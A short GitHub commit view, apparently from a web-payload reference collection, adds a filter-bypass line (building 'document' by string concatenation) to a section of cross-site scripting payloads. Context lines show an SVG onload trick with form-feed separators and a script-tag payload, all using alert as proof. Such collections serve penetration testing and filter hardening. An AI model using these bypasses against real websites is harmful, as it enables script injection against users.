Add document blacklist bypass

This commit is contained in:
Ooggle 2022-04-09 12:55:21 +02:00 committed by GitHub
parent 9d07e04de7
commit 39d1c6e7d8
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -725,6 +725,7 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
```javascript ```javascript
<div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script> <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
window["doc"+"ument"]
``` ```
### Bypass using javascript inside a string ### Bypass using javascript inside a string